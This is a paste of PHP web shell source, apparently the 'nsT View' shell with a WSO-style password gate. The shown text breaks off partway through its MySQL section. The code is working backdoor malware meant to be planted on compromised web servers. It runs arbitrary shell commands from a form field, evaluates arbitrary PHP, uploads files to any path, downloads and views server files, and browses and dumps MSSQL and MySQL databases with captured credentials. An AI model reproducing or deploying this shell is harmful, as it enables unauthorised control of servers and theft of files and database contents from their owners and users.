· 10 years ago · Aug 25, 2016, 09:54 PM
1<?php
2$auth_pass = "8345af5deeca3a59993310190043292d";
3function wsoLogin() {
4 die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
5}
6
7function WSOsetcookie($k, $v) {
8 $_COOKIE[$k] = $v;
9 setcookie($k, $v);
10}
11
12if(!empty($auth_pass)) {
13 if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
14 WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
15
16 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
17 wsoLogin();
18}
19# SanFour25 :: sanfour25.com
20@set_time_limit(0);
21@set_magic_quotes_runtime(0);
22@ob_start("ob_gzhandler"); # gzip for web, you can disable it if not supported.
23@ini_set("display_errors","1");
24#@ini_set("session.save_path","/home/some/folder/");
25session_start();
26@error_reporting(E_ALL & ~E_NOTICE);
27
28# config
29$password = "nst";
30$show_mmsql_sys_tables = true;
31
32# Login system
33if(!isset($_SESSION['php_nst'])){
34# you can comment this string out, and send POST request $_POST['php_nst'] with password like in variable $password
35# and you will be logined in to nstview.
36$_POST['php_nst'] = $password; # comment out this string to enable unique security. // #
37}
38#end of config
39
40
41
42if($_POST['php_nst'] == $password){
43$_SESSION['php_nst'] = base64_encode($password);
44}
45
46if($_SESSION['php_nst'] and
47 $_SESSION['php_nst'] != base64_encode($password)){
48session_destroy();
49die;
50}
51
52if(!isset($_SESSION['php_nst'])){die;}
53
54
55# functions
56$ver = "3.1.Post";
57
58function perm($perms){
59if (($perms & 0xC000) == 0xC000) {
60 $info = 's';
61} elseif (($perms & 0xA000) == 0xA000) {
62 $info = 'l';
63} elseif (($perms & 0x8000) == 0x8000) {
64 $info = '-';
65} elseif (($perms & 0x6000) == 0x6000) {
66 $info = 'b';
67} elseif (($perms & 0x4000) == 0x4000) {
68 $info = 'd';
69} elseif (($perms & 0x2000) == 0x2000) {
70 $info = 'c';
71} elseif (($perms & 0x1000) == 0x1000) {
72 $info = 'p';
73} else {
74 $info = 'u';
75}
76$info .= (($perms & 0x0100) ? 'r' : '-');
77$info .= (($perms & 0x0080) ? 'w' : '-');
78$info .= (($perms & 0x0040) ?
79 (($perms & 0x0800) ? 's' : 'x' ) :
80 (($perms & 0x0800) ? 'S' : '-'));
81$info .= (($perms & 0x0020) ? 'r' : '-');
82$info .= (($perms & 0x0010) ? 'w' : '-');
83$info .= (($perms & 0x0008) ?
84 (($perms & 0x0400) ? 's' : 'x' ) :
85 (($perms & 0x0400) ? 'S' : '-'));
86$info .= (($perms & 0x0004) ? 'r' : '-');
87$info .= (($perms & 0x0002) ? 'w' : '-');
88$info .= (($perms & 0x0001) ?
89 (($perms & 0x0200) ? 't' : 'x' ) :
90 (($perms & 0x0200) ? 'T' : '-'));
91return $info;
92}
93
94
95if(@get_magic_quotes_gpc()){
96foreach($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}
97foreach($_COOKIE as $k=>$v){$_COOKIE[$k] = stripslashes($v);}
98}
99
100if(preg_match("/:\\\/",getcwd())){
101$os = "Windows";
102}else{
103$os = "Unix";
104}
105
106
107
108function file_get_contents_2($f){
109return join('',file($f));
110}
111
112function show_error($str){
113print "<font color=red><b>".$str."</b></font>";
114}
115
116
117function write($filename,$param,$text){
118# param: w, a
119$fp = fopen($filename,$param);
120flock($fp,LOCK_EX);
121fwrite($fp,$text);
122fflush($fp);
123flock($fp,LOCK_UN);
124fclose($fp);
125}
126
127
128function get_size($size){
129if ($size < 1024){$siz=$size.'B';}else{
130if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').'Kb';}else{
131if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').'Mb';}else{
132if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').'Gb';}
133}}}
134return $siz;
135}
136
137
138function my_ip(){
139if($_SERVER["HTTP_CLIENT_IP"]){return $_SERVER["HTTP_CLIENT_IP"];}
140if($_SERVER["HTTP_X_FORWARDED_FOR"]){return $_SERVER["HTTP_X_FORWARDED_FOR"];}
141return $_SERVER['REMOTE_ADDR'];
142}
143
144
145if($_POST['nst_cmd']=="goto"){
146if($_POST['nst_tmp']=="phpinfo"){
147phpinfo();
148die;
149}
150}
151
152
153if($_POST['nst_cmd']=="goto"){
154if($_POST['nst_tmp']=="download"){
155header("Content-disposition: attachment; filename=\"".$_POST['nst_tmp2']."\";");
156header("Content-length: ".filesize($_POST['nst_tmp3']));
157header("Content-Type: application/octet-stream");
158header("Expires: 0");
159readfile($_POST['nst_tmp3']);
160die;
161}
162}
163
164
165
166
167function mssql_dump_table($adr, $login, $pass, $db, $table){
168mssql_connect($adr, $login, $pass);
169mssql_select_db($db);
170$texttypes = array('binary','char','nchar','varchar','nvarchar');
171$masterquery = '';
172$tablequery = ('CREATE TABLE ' . $table);
173$columns = array();
174$tablesep = explode('.',$table);
175$colquery = ('sp_columns @table_name = N\'' . $tablesep[0] . '\'');
176$column_query = mssql_query($colquery);
177if(mssql_num_rows($column_query) > 0) $tablequery .= ' (';
178while($row = mssql_fetch_assoc($column_query)){
179$colspec = ($row['COLUMN_NAME'] . ' ' . strtoupper($row['TYPE_NAME']));
180if(in_array($row['TYPE_NAME'],$texttypes)) $colspec .= ('(' . $row['PRECISION'] . ')');
181if(!$row['NULLABLE']) $colspec .= ' NOT NULL';
182if($row['COLUMN_DEF'] != '') $colspec .= (' DEFAULT ' . $row['COLUMN_DEF']);
183$tablequery .= (', ' . $colspec);}
184if(mssql_num_rows($column_query) > 0) $tablequery .= ')';
185$tablequery = str_replace('(, ','(',$tablequery);
186$masterquery .= ($tablequery . ';' . "\r\n");
187$table_query = mssql_query('SELECT * FROM ' . $table . ';');
188while($row = mssql_fetch_assoc($table_query)){
189if(!isset($schema)){
190$schema = array();
191foreach($row AS $key => $value) $schema[] = $key;}
192$values = array();
193foreach($schema AS $col)
194if(is_numeric($row[$col]))
195$values[] = ('\'' . str_replace('\'','\'\'',$row[$col]) . '\'');
196else if(!empty($_POST['base64']))
197$values[] = ('\'' . base64_encode(str_replace('\'','\'\'',$row[$col])) . '\'');
198else
199$values[] = ('\'' . str_replace('\'','\'\'',$row[$col]) . '\'');
200$masterquery .= ('INSERT INTO ' . $table . ' (' . implode(',',$schema) . ') VALUES (' . implode(',',$values) . ');' . "\r\n");}
201$masterquery = rtrim($masterquery);
202header('Content-type: application/x-download');
203header('Content-Disposition: attachment; filename="'.$table.'.txt"');
204header('Content-Length: '.strlen($masterquery));
205print $masterquery;
206die;
207}
208
209
210
211
212function mysql_dump_table($adr, $login, $pass, $db, $table){
213mysql_connect($adr, $login, $pass, $db, $table);
214mysql_select_db($db);
215$que = mysql_query("SELECT * FROM `".$table."`");
216if(mysql_num_rows($que)>0){
217while($row = mysql_fetch_assoc($que)){
218$keys = join("`, `", array_keys($row));
219$values = array_values($row);
220foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
221$values = implode("', '", $values);
222$sql .= "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
223}
224}
225header('Content-type: application/x-download');
226header('Content-Disposition: attachment; filename="'.$table.'.txt"');
227header('Content-Length: '.strlen($sql));
228print $sql;
229die;
230}
231
232
233
234
235if($_POST['nst_tmp4']=="dump_table"){
236mssql_dump_table(base64_decode($_SESSION['ma']), base64_decode($_SESSION['ml']), base64_decode($_SESSION['mp']), $_POST['nst_tmp3'], $_POST['nst_tmp5']);
237}
238
239
240if($_POST['nst_tmp4']=="dump_table_my"){
241mysql_dump_table(base64_decode($_SESSION['ma_my']), base64_decode($_SESSION['ml_my']), base64_decode($_SESSION['mp_my']), $_POST['nst_tmp3'], $_POST['nst_tmp5']);
242}
243
244
245
246
247
248?>
249<title>nsT View v<?php print $ver;?></title>
250<style>
251body, td{
252font-family:verdana;
253font-size:11px;
254font-weight:bold;
255}
256
257input,select,textarea{
258font-family:verdana;
259font-size:11px;
260background-color:#A4D5FF;
261border-color:E3E3E3;
262border-style:inset;
263border-width:1px;
264color:#001D34;
265}
266
267.border{
268border:1px dashed #4C4C4C;
269}
270
271a:visited {
272color: #474CFF;
273text-decoration: none;
274}
275a:hover {
276color: #FF474C;
277text-decoration: none;
278}
279a:link {
280color: #474CFF;
281text-decoration: none;
282}
283a:active {
284color: #474CFF;
285text-decoration: underline;
286}
287</style>
288
289<script php_expert=1>
290function ifenter(event){
291var keyCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode;
292if (keyCode == 13) {
293return true;
294}else{
295return false;
296}
297}
298
299function nst_goto(to){
300document.getElementById("nst_cmd").value = "goto";
301document.getElementById("nst_tmp").value = to;
302}
303
304function nst_submit(){
305document.getElementById("nst_form").submit();
306}
307
308function set_value(id, v){
309document.getElementById(id).value = v;
310}
311
312function nst_chdir(dir){
313document.getElementById("nst_cmd").value = "chdir";
314document.getElementById("nst_tmp").value = dir;
315nst_submit()
316}
317
318function nst_cmd_ex(event){
319if(ifenter(event)){
320nst_goto("nst1");
321nst_submit();
322}
323}
324
325function nst_upload(){
326nst_goto("upload");
327nst_submit();
328}
329
330function nst_download(f, p){
331nst_goto("download");
332set_value("nst_tmp2", f);
333set_value("nst_tmp3", p);
334nst_submit();
335}
336
337function nst_view(f, dir){
338nst_goto("view");
339set_value("nst_tmp2", f);
340set_value("nst_tmp3", "nst_view_chdir");
341set_value("nst_tmp4", dir);
342nst_submit();
343}
344
345function nst_mssql_login(){
346nst_goto("mssql");
347nst_submit();
348}
349
350function nst_mssql_select_db(db){
351nst_goto("ms_dbs");
352set_value("nst_tmp2", "list_tables");
353set_value("nst_tmp3", db);
354set_value("nst_tmp4", "");
355nst_submit();
356}
357
358function nst_mssql_select_table(db, table){
359nst_goto("ms_dbs");
360set_value("nst_tmp2", "list_tables");
361set_value("nst_tmp3", db);
362set_value("nst_tmp4", "show_table_content");
363set_value("nst_tmp5", table);
364if(document.getElementById("sql_q")){
365document.getElementById("sql_q").value="SELECT TOP 30 * FROM ["+table+"];";
366}
367nst_submit();
368}
369
370function nst_mssql_run_query(db, table){
371nst_goto("ms_dbs");
372set_value("nst_tmp2", "list_tables");
373set_value("nst_tmp3", db);
374set_value("nst_tmp4", "show_table_content");
375set_value("nst_tmp5", table);
376nst_submit();
377}
378
379function nst_mssql_dump_table(db, table){
380nst_goto("ms_dbs");
381set_value("nst_tmp2", "list_tables");
382set_value("nst_tmp3", db);
383set_value("nst_tmp4", "dump_table");
384set_value("nst_tmp5", table);
385nst_submit();
386}
387
388function nst_run_eval(){
389nst_goto("tools");
390nst_submit();
391}
392
393function nst_mysql_login(){
394nst_goto("mysql");
395nst_submit();
396}
397
398function nst_mysql_select_db(db){
399nst_goto("my_dbs");
400set_value("nst_tmp2", "list_tables_my");
401set_value("nst_tmp3", db);
402set_value("nst_tmp4", "");
403nst_submit();
404}
405
406function nst_mysql_select_table(db, table){
407nst_goto("my_dbs");
408set_value("nst_tmp2", "list_tables_my");
409set_value("nst_tmp3", db);
410set_value("nst_tmp4", "show_table_content_my");
411set_value("nst_tmp5", table);
412if(document.getElementById("sql_q")){
413document.getElementById("sql_q").value="SELECT * FROM "+table+" LIMIT 0,30";
414}
415nst_submit();
416}
417
418function nst_mysql_run_query(db, table){
419nst_goto("my_dbs");
420set_value("nst_tmp2", "list_tables_my");
421set_value("nst_tmp3", db);
422set_value("nst_tmp4", "show_table_content_my");
423set_value("nst_tmp5", table);
424nst_submit();
425}
426
427function nst_mysql_dump_table(db, table){
428nst_goto("my_dbs");
429set_value("nst_tmp2", "list_tables_my");
430set_value("nst_tmp3", db);
431set_value("nst_tmp4", "dump_table_my");
432set_value("nst_tmp5", table);
433nst_submit();
434}
435</script>
436
437<?php
438# change dir
439if($_POST['nst_cmd']=="chdir"){
440$d = $_POST['nst_tmp'];
441}else{
442
443if($_POST['nst_cur_dir']){$d = $_POST['nst_cur_dir'];}else{$d = getcwd();}
444
445}
446$d = str_replace("\\","/", $d);
447$d = str_replace("//","/", $d);
448
449if(preg_match("/\.\.$/", $d)){
450$d = preg_replace("/\/[^\/]+\/\.\.$/", "", $d);
451}
452
453$d = $d."/";
454
455
456
457# path to go
458preg_match_all("/([^\/]+)\//", $d, $m);
459$s = sizeof($m[0]);
460if($os=="Unix"){
461$path_chdir = "/";
462}
463for($i=0; $i<$s; $i++){
464$path_chdir .= $m[0][$i];
465
466if($os=="Windows"){
467if($i!=0){$sl="/";}else{$sl="";}
468}else{
469if($i==0){$path_to_go="<a href='#' onclick='nst_chdir(\"/\"); nst_submit();'>/</a><a href='#' onclick='nst_chdir(\"".$path_chdir."\"); nst_submit();'>".str_replace("/","",$m[0][$i])."</a>";}else{$sl="/";}
470}
471
472if($os=="Unix"){
473if($i!=0){
474$path_to_go .= "<a href='#' onclick='nst_chdir(\"".$path_chdir."\"); nst_submit();'>".$sl.str_replace("/","",$m[0][$i])."</a>";
475}
476}else{
477$path_to_go .= "<a href='#' onclick='nst_chdir(\"".$path_chdir."\"); nst_submit();'>".$sl.str_replace("/","",$m[0][$i])."</a>";
478}
479}
480
481if(empty($path_to_go) and $os=="Unix"){$path_to_go="<a href='#' onclick='nst_chdir(\"/\"); nst_submit();'>/</a>";}
482
483
484# home dir
485$home_dir = getcwd();
486$home_dir = str_replace("\\","/", $home_dir);
487$home_dir = str_replace("//","/", $home_dir);
488
489
490?>
491
492
493
494<table align=center border=0 width=650 bgcolor=#D7FFA8 class=border>
495<form method=post id=nst_form enctype=multipart/form-data>
496<tr><td align=center>
497<input type=hidden id=nst_cmd name=nst_cmd>
498<input type=hidden id=nst_tmp name=nst_tmp>
499<input type=hidden id=nst_tmp2 name=nst_tmp2>
500<input type=hidden id=nst_tmp3 name=nst_tmp3>
501<input type=hidden id=nst_tmp4 name=nst_tmp4>
502<input type=hidden id=nst_tmp5 name=nst_tmp5>
503<input type=hidden id=nst_cur_dir name=nst_cur_dir value='<?php print str_replace("//","/",$d); ?>'>
504<font size=2>
505<a href='http://nst.void.ru' target=_blank>NETWORK SECURITY TEAM<br>nstview.php v<?php print $ver;?></a></td></tr>
506<tr><td>
507
508<table border=0>
509<tr><td><font face=wingdings size=2 color=#FF0000>0</font> <?php print $path_to_go; ?></td></tr>
510</table>
511
512<table border=0>
513<tr>
514<td>Your IP: [<font color=#5F3CC1><?php print my_ip(); ?></font>]</td>
515<td>Server IP: [<font color=#5F3CC1><?php print gethostbyname($_SERVER["HTTP_HOST"]); ?></font>]</td>
516<td>Server Address: [<font color=#5F3CC1><?php print $_SERVER["HTTP_HOST"]; ?></font>]</td>
517</tr>
518</table>
519<center>
520<?php
521if($os=="Windows"){
522print "<font face=wingdings size=2 color=red><</font>";
523for($i=65; $i<=90; $i++){
524print "<a href='#' onclick='nst_chdir(\"".chr($i).":\"); nst_submit();'>".chr($i)."</a> ";
525}
526}
527?>
528</center>
529<table border=0>
530<tr>
531<td>[<a href='#' onclick='nst_chdir("<?php print $home_dir; ?>"); nst_submit();'>Home</a>]</td>
532<td>[<a href='#' onclick='nst_goto("nst1"); nst_submit();'>nsT</a>]</td>
533<td>[<a href='#' onclick='nst_goto("upload"); nst_submit();'>Upload</a>]</td>
534<td>[<a href='#' onclick='nst_goto("tools"); nst_submit();'>Tools</a>]</td>
535<td>[<a href='#' onclick='nst_goto("mssql"); nst_submit();'>M$SQL</a>]</td>
536<td>[<a href='#' onclick='nst_goto("mysql"); nst_submit();'>MySQL</a>]</td>
537<td>[<a href='#' onclick='nst_goto("phpinfo"); nst_submit();'>PHPinfo</a>]</td>
538</tr>
539</table>
540
541
542
543<?php
544# nst1 function
545if($_POST['nst_cmd']=="goto"){
546if($_POST['nst_tmp']=="nst1"){
547
548if(!$_POST['nst_cur_dir']){
549$cmd_dir = getcwd();
550}else{
551$cmd_dir = $_POST['nst_cur_dir'];
552}
553chdir($cmd_dir);
554
555?>
556<center>
557<br>
558Enter command:
559<br>
560<input name=cmd size=60 autocomplete=off onKeyPress='nst_cmd_ex(event);'><br>
561Current directory:<br>
562<input name=cmd_dir size=60 autocomplete=off onKeyPress='nst_cmd_ex(event);' value='<?php print $cmd_dir;?>'>
563<?php
564if($_POST['cmd']){
565htmlspecialchars($_POST['cmd']);
566?>
567</center>
568<pre><font size=3 face=verdana>
569<?php
570$cmd = $_POST['cmd'];
571print `$cmd`;
572?>
573</pre>
574<?php
575}
576}
577}
578#end of nst1 function
579
580
581
582# upload function
583if($_POST['nst_cmd']=="goto"){
584if($_POST['nst_tmp']=="upload"){
585
586?>
587<center>
588<br>
589Select file to upload:
590<br>
591<input type=file name=f><br>
592<br>
593Write path where to upload:
594<br>
595<input name=wup autocomplete=off size=60 value='<?php print $_POST['nst_cur_dir']; ?>'><br>
596<br>
597<input type=button onclick='nst_upload()' value='Upload file'>
598<br>
599<?php
600if($_POST['wup'] and !empty($_FILES['f']['name'])){
601if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_POST['wup']."/".$_FILES['f']['name'])){
602print "<font color=red><b>Cant upload, maybe check chmod ? or folder exists ?</font></b>";
603}else{
604print "<font color=green><b>OK uploaded to:<br>".str_replace("//","/",str_replace("\\","/",str_replace("//","/",$_POST['wup']."/".$_FILES['f']['name'])));
605}
606}
607}
608}
609#end of upload function
610
611
612
613
614# view files function
615if($_POST['nst_cmd']=="goto"){
616if($_POST['nst_tmp']=="view"){
617preg_match("/\/([^\/]+)$/", $_POST['nst_tmp2'], $m);
618
619print "<br><center>
620<a href='#' onclick='nst_download(\"".$m[1]."\",\"".$_POST['nst_tmp2']."\");'><font color=#FF474C>:: DOWNLOAD THIS FILE ::</font></a>
621</center>
622
623<pre><font size=3 face=verdana>";
624highlight_file($_POST['nst_tmp2']);
625}
626}
627#end of view files function
628
629
630
631# directory listing function
632if(($_POST['nst_cmd']=="chdir" or !$_POST) or $_POST['php_nst']){
633
634$dirs = array();
635$files = array();
636$dh = @opendir($d) or die("<center>Permission Denied or Folder/Disk does not exist</center>");
637while (!(($f = readdir($dh)) === false)) {
638if (is_dir($d."/".$f)) {
639$dirs[]=$f;
640}else{
641$files[]=$f;
642}
643sort($dirs);
644sort($files);
645}
646
647
648print "<table border=0 width=100%>
649<tr bgcolor=#9C9FFF align=center>
650<td>Filename</td>
651<td>Tools</td>
652<td>Size</td>
653<td>Owner/Group</td>
654<td>Pemrs</td></tr>";
655
656$all_files = array_merge($dirs, $files);
657
658$i=0;
659foreach($all_files as $name){
660if($i%2){
661$c="#D1D1D1";
662}else{
663$c="";
664}
665
666$perms = @fileperms($d."/".$name);
667$owner = @fileowner($d."/".$name);
668$group = @filegroup($d."/".$name);
669
670if($os=="Unix"){
671if(function_exists("posix_getpwuid") and function_exists("posix_getgrgid")){
672$fileownera=@posix_getpwuid($owner);
673$owner=$fileownera['name'];
674$groupinfo = @posix_getgrgid($group);
675$group=$groupinfo['name'];
676}
677}
678$perms=perm($perms);
679
680if(is_dir($d."/".$name)){
681$ico = 0;
682$ico_c = "#800080";
683$options = "DIR";
684$size = "";
685$todo = "nst_chdir(\"".$d."/".$name."\"); nst_submit();";
686}else{
687$ico = 2;
688$ico_c = "#FF474C";
689$options = "<a href='#' onclick='nst_download(\"".$name."\",\"".$d."/".$name."\"); return false;' title='Download'>D</a>";
690$size = get_size(@filesize($d."/".$name));
691preg_match("/^(.*?)\/([^\/]+)$/is", $d."/".$name, $m);
692$todo = "nst_view(\"".$d."/".$name."\", \"".$m[1]."\");";
693}
694
695print "<tr bgcolor='".$c."'
696 onMouseOver=\"this.style.background='#56B2F9';\"
697 onMouseOut=\"this.style.background='".$c."';\">
698
699<td onclick='".$todo."' width=100%><label><font face=wingdings size=2 color=".$ico_c.">".$ico."</font> ".$name."</td>
700
701
702<td align=center>".$options."</td>
703
704<td align=center width=60 nowrap><font color=#343AFF>".$size."</td>
705<td align=center width=95 nowrap align=center>".$owner."/".$group."</td>
706<td align=center width=95 nowrap>".$perms."</td></tr>";
707$i++;
708}
709?>
710</table>
711<?php
712}
713#end of directory listing function
714
715
716
717
718# tools function
719if($_POST['nst_cmd']=="goto"){
720if($_POST['nst_tmp']=="tools"){
721?>
722
723<center>
724<br>
725Enter php code:
726<br>
727<?php<Br>
728<textarea name=php_ev_c style='width:500px; height:200px;'><?php print $_POST['php_ev_c'];?></textarea><br>
729?><br>
730<input type=button value='Run php code' onclick='nst_run_eval();'>
731<?php
732if($_POST['php_ev_c']){
733?>
734</center><br>
735<pre><font size=3 face=verdana color=green>
736<?php
737print "<?\r\n".$_POST['php_ev_c']."\r\n?><br>";
738print "<font color=#FF474C><br>";
739eval($_POST['php_ev_c']);
740?>
741</pre>
742<?php
743}
744}
745}
746#end of nst1 function
747
748
749
750
751
752################### mssql ##################
753
754
755
756# mssql login
757if($_POST['nst_cmd']=="goto"){
758if($_POST['nst_tmp']=="mssql"){
759?>
760<center>
761<br>
762Microsoft SQL Server manager:<br>
763<br>
764Address:<br>
765<input name=m_adr value=localhost autocomplete=off><br>
766Login:<br>
767<input name=m_login value=sa autocomplete=off><br>
768Password:<br>
769<input name=m_pass autocomplete=off><br>
770<input type=button onclick='nst_mssql_login()' value='Login'>
771<br>
772<?php
773if($_POST['m_adr'] and $_POST['m_login']){
774if(!@mssql_connect($_POST['m_adr'], $_POST['m_login'], $_POST['m_pass'])){
775show_error("Cant connect to mssql server!<br>(".mssql_get_last_message().")");
776unset($_SESSION['ma']);
777unset($_SESSION['ml']);
778unset($_SESSION['mp']);
779}else{
780$_SESSION['ma']=base64_encode($_POST['m_adr']);
781$_SESSION['ml']=base64_encode($_POST['m_login']);
782$_SESSION['mp']=base64_encode($_POST['m_pass']);
783
784print "<br>Connected !<br><br><a href='#' onclick='nst_goto(\"ms_dbs\"); nst_submit(); return false;'>Show data bases</a>";
785}
786}
787
788}
789}
790#end of mssql login
791
792
793if($_SESSION['ma'] and $_SESSION['ml'] and $_SESSION['mp']){
794if(!@mssql_connect(base64_decode($_SESSION['ma']), base64_decode($_SESSION['ml']), base64_decode($_SESSION['mp']))){
795show_error("Cant connect to mssql server!<br>(".mssql_get_last_message().")");
796unset($_SESSION['ma']);
797unset($_SESSION['ml']);
798unset($_SESSION['mp']);
799}
800}
801
802
803# mssql db's
804if($_POST['nst_cmd']=="goto"){
805if($_POST['nst_tmp']=="ms_dbs"){
806
807
808if(!$q = @mssql_query("sp_helpdb")){show_error("Cant list databases!<br>(".mssql_get_last_message().")");}
809
810print "<br><table border=0 align=center>
811<tr align=center bgcolor=#7CC2FF><td>DB Name</td><td>Size</td><td>Owner</td><td>Created</td></tr>";
812while($row = mssql_fetch_array($q)){
813
814if($_POST['nst_tmp3']==$row['name']){
815$tc="#FF47FF";
816}else{
817$tc="";
818}
819
820print "<tr onMouseOver='this.style.background=\"#FFFEC8\";' onMouseOut='this.style.background=\"#A2D8FF\";' bgcolor=\"#A2D8FF\">
821 <td><a href='#' onclick='nst_mssql_select_db(\"".$row['name']."\"); return false;'><font color=".$tc.">".$row['name']."</td>
822 <td>".$row['db_size']."</td>
823 <td align=center>".$row['owner']."</td>
824 <td>".$row['created']."</td>
825 </tr>";
826}
827print "</table>";
828
829
830
831
832}
833}
834#end of mssql db's
835
836
837
838# mssql list tables
839if($_POST['nst_tmp2']=="list_tables"){
840if(!@mssql_select_db($_POST['nst_tmp3'])){show_error("Cant select db!<br>(".mssql_get_last_message().")");}
841if(!$q = @mssql_query('sp_tables')){show_error("Cant list tables!<br>(".mssql_get_last_message().")");}
842
843print "<br><table border=0 align=center>
844<tr align=center bgcolor=#7CC2FF><td>Table name</td><td>Owner</td><td>Download</td></tr>";
845while($row = mssql_fetch_array($q)){
846
847if($_POST['nst_tmp5']==$row['TABLE_NAME']){
848$tc="#FF47FF";
849}else{
850$tc="";
851}
852
853if($row['TABLE_TYPE'] == 'TABLE' and $row['TABLE_NAME'] != 'dtproperties'){
854$record_query = mssql_query("SELECT count(*) AS itemcount FROM [".$row['TABLE_NAME']."]");
855$record_array = mssql_fetch_array($record_query);
856$records = $record_array['itemcount'];
857
858print "<tr onMouseOver='this.style.background=\"#FFFEC8\";' onMouseOut='this.style.background=\"#A2D8FF\";' bgcolor=\"#A2D8FF\">
859 <td nowrap><a href='#' onclick='nst_mssql_select_table(\"".$_POST['nst_tmp3']."\",\"".$row['TABLE_NAME']."\"); return false;'><font color=".$tc.">".$row['TABLE_NAME']." (".$records.")</td>
860 <td align=center>".$row['TABLE_OWNER']."</td>
861 <td align=center><a href='#' onclick='nst_mssql_dump_table(\"".$_POST['nst_tmp3']."\",\"".$row['TABLE_NAME']."\"); return false;'>Dump</a></td>
862 </tr>";
863}else{
864
865if($show_mmsql_sys_tables == true){
866if(!empty($tc)){$stc=$tc;}else{$stc="red";}
867print "<tr onMouseOver='this.style.background=\"#FFFEC8\";' onMouseOut='this.style.background=\"#A2D8FF\";' bgcolor=\"#A2D8FF\">
868 <td nowrap><a href='#' onclick='nst_mssql_select_table(\"".$_POST['nst_tmp3']."\",\"".$row['TABLE_NAME']."\"); return false;'><font color=".$stc.">".$row['TABLE_NAME']."</td>
869 <td align=center>".$row['TABLE_OWNER']."</td>
870 <td align=center><a href='#' onclick='nst_mssql_dump_table(\"".$_POST['nst_tmp3']."\",\"".$row['TABLE_NAME']."\"); return false;'>Dump</a></td>
871 </tr>";
872}
873
874}
875
876}
877print "</table>";
878
879}
880#end of list tables
881
882
883
884
885
886# mssql show table content
887if($_POST['nst_tmp4']=="show_table_content"){
888
889
890if(!$_POST['sql_q']){
891$sql_q = "SELECT TOP 30 * FROM [".$_POST['nst_tmp5']."]";
892}else{
893$sql_q = $_POST['sql_q'];
894}
895
896
897print "<table border=0 align=center>
898<tr><td><a name=sql_q></a>Type SQL to execute:</td></tr>
899<tr><td><textarea name=sql_q style='width:500px; height:100px;' id=sql_q>".$sql_q."</textarea><br>
900<input type=button value='Run sql query' onclick=\"nst_mssql_run_query('".$_POST['nst_tmp3']."','".$_POST['nst_tmp5']."');\"> Fast SQL:
901<input type=button onclick='document.getElementById(\"sql_q\").value=\"SELECT TOP 30 * FROM [".$_POST['nst_tmp5']."];\"' value=Select>
902<input type=button onclick='document.getElementById(\"sql_q\").value=\"INSERT INTO ".$_POST['nst_tmp5']."\\n(field1, field2, field3)\\nVALUES ('value1','value2','value3');\"' value=Insert>
903<input type=button onclick='document.getElementById(\"sql_q\").value=\"UPDATE ".$_POST['nst_tmp5']."\\nSET field1='value1', field2='value2', field3='value3'\\nWHERE field1='abc';\"' value=Update>
904<input type=button onclick='document.getElementById(\"sql_q\").value=\"DELETE FROM ".$_POST['nst_tmp5']."\\nWHERE field1='abc';\"' value='Delete'>
905</tr><td>
906</table>";
907
908
909if(!$q = @mssql_query($sql_q)){show_error("<center>Query failed!<br>(".mssql_get_last_message().")");}else{
910
911if(preg_match("/SELECT\s/is", $sql_q)){
912
913$fields = array();
914print "<br><table border=0 align=center>";
915print "<tr bgcolor=#7CC2FF>";
916while($row = mssql_fetch_field($q)){
917print "<td>".$row->name."</td>";
918$fields[] = $row->name;
919}
920print "</tr>";
921
922
923
924while($row = mssql_fetch_array($q)){
925print "<tr onMouseOver='this.style.background=\"#FFFEC8\";' onMouseOut='this.style.background=\"#A2D8FF\";' bgcolor=\"#A2D8FF\">";
926$i=0;
927foreach($row as $key=>$value){
928if($i%2){
929print "<td nowrap>".$value."</td>";
930}
931$i++;
932}
933print "</tr>";
934}
935
936
937print "</table>";
938
939}else{
940print "
941<br>
942<table align=center>
943<tr><td>Success!</td></tr>
944<tr><td nowrap><font color=green><pre>".$sql_q."</td></tr>
945</table>";
946}
947}
948}
949#end of mssql show table content
950
951
952
953
954
955
956
957
958
959
960
961
962################ mysql ####################
963
964
965
966
967# mysql login
968if($_POST['nst_cmd']=="goto"){
969if($_POST['nst_tmp']=="mysql"){
970?>
971<center>
972<br>
973MySQL Server manager:<br>
974<br>
975Address:<br>
976<input name=m_adr_my value=localhost autocomplete=off><br>
977Login:<br>
978<input name=m_login_my value=root autocomplete=off><br>
979Password:<br>
980<input name=m_pass_my autocomplete=off><br>
981<input type=button onclick='nst_mysql_login()' value='Login'>
982<br>
983<?php
984if($_POST['m_adr_my'] and $_POST['m_login_my']){
985if(!@mysql_connect($_POST['m_adr_my'], $_POST['m_login_my'], $_POST['m_pass_my'])){
986show_error("Cant connect to mysql server!<br>(".mysql_error().")");
987}else{
988$_SESSION['ma_my']=base64_encode($_POST['m_adr_my']);
989$_SESSION['ml_my']=base64_encode($_POST['m_login_my']);
990$_SESSION['mp_my']=base64_encode($_POST['m_pass_my']);
991
992print "<br>Connected !<br><br><a href='#' onclick='nst_goto(\"my_dbs\"); nst_submit(); return false;'>Show data bases</a>
993<br><br>
994MySQL version: ".mysql_get_server_info()."<br>";
995}
996}
997
998}
999}
1000#end of mysql login
1001
1002
1003if($_SESSION['ma_my'] and $_SESSION['ml_my'] and $_SESSION['mp_my']){
1004if(!@mysql_connect(base64_decode($_SESSION['ma_my']), base64_decode($_SESSION['ml_my']), base64_decode($_SESSION['mp_my']))){
1005show_error("Cant connect to mysql server!<br>(".mysql_error().")");
1006unset($_SESSION['ma_my']);
1007unset($_SESSION['ml_my']);
1008unset($_SESSION['mp_my']);
1009}
1010}
1011
1012
1013# mysql db's
1014if($_POST['nst_cmd']=="goto"){
1015if($_POST['nst_tmp']=="my_dbs"){
1016
1017
1018if(!$q = mysql_list_dbs()){show_error("Cant list databases!<br>(".mysql_error().")");}
1019
1020print "<br><table border=0 align=center>
1021<tr align=center bgcolor=#7CC2FF><td>DB Name</td></tr>";
1022while($row = mysql_fetch_array($q)){
1023
1024if($_POST['nst_tmp3']==$row[0]){
1025$tc="#FF47FF";
